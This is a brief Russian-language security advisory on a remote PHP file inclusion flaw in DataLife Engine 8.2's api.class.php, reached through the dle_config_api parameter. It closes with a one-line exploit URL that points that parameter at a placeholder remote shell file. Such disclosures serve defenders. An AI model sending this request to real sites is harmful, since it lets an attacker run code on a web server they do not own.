Программа: DataLife Engine 8.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «dle_config_api» сценарием api.class.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]



Оставить мнение